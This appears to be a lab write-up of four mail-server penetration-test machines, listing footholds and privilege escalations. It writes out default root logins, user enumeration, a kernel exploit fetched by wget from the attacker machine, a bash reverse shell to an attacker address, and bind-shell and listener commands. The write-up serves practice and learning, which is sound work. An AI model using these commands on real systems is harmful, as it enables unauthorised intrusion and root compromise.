Skip to main content


Mail 1: Apache James

Target: Linux

Foothold: Misconfiguration

Admin CLI

nc $target 4555
Login id: root
Password: root


setpassword <user> <newpassword>

IMAP/POP3 Client

  • Access user mailbox
  • Find SSH credentials

Privilege Escalation: Kernel exploit

# Download memodipper.c to Kali
# Start python web server
# Download and compile on target
cd /tmp
wget http://$kaliIP/memodipper.c
gcc memodipper.c -o pwn
chmod +x pwn

Mail 2: Postfix

Target: Linux

Foothold:: Misconfiguration & Postfix Shellshock

  • nmap scan shows local domain is mail.local
  • List SMB shares
smbclient -L //$target -U '' --option="client min protocol=core"
  • SMB allows anonymous login
  • SMB shares reveal user home directories and usernames
  • Connect to Postfix service
nc $target 25
VRFY admin@mail.local
  • Receive confirmation of user existence
  • Check searchsploit for Postfix version
searchsploit postfix

Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote C | linux/remote/
  • Google search for Postfix shellshock
  • Start listener
sudo nc -lnvp $tcpPort
  • Run the exploit
python2 $target admin@mail.local $kaliIP $tcpPort

Privilege Escalation: Cron job running as root

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/$kaliIP/$tcpPort 0>&1' >
  • Start a listener
  • Wait for cron to trigger the script

Mail 3: Apache James

Target: Linux

Foothold: RCE

  • Apache James version is vulnerable to RCE
  • Apache James Server 2.3.2 - Remote Command Execution | linux/remote/
  • Copy the exploit
  • Change the payload
  • Set the user and password to root:root
  • Run python2 $target
  • Start msfconsole and use exploit/multi/handler
set lhost <kali ip>
set lport <tcp port>

Privilege Escalation: File permissions

  • /etc/init.d/james is world-writeable
  • Modify the start-up script with a new reverse shell
  • I am able to run sudo reboot
  • Start listener
  • Catch new shell

Mail 4: Sendmail + ClamAV Milter

Target: Linux

Foothold: RCE

  • Initial TCP port scan showed Sendmail and SNMP
  • UDP port scan revealed SNMP port
  • Ran all SNMP Nmap scripts against the UDP port
  • Found interesting process of ClamAV acting as Sendmail milter
  • Searchsploit for Clam AV and triangulated on Sendmail
  • Exploit DB ID:
  • Exploit opens a bind shell on 31337 on the target using Clam AV milter
  • Run the exploit
perl $target
  • Connect to the bind shell
nc -nv $target 31337

Privilege Escalation: Vulnerable service is running as root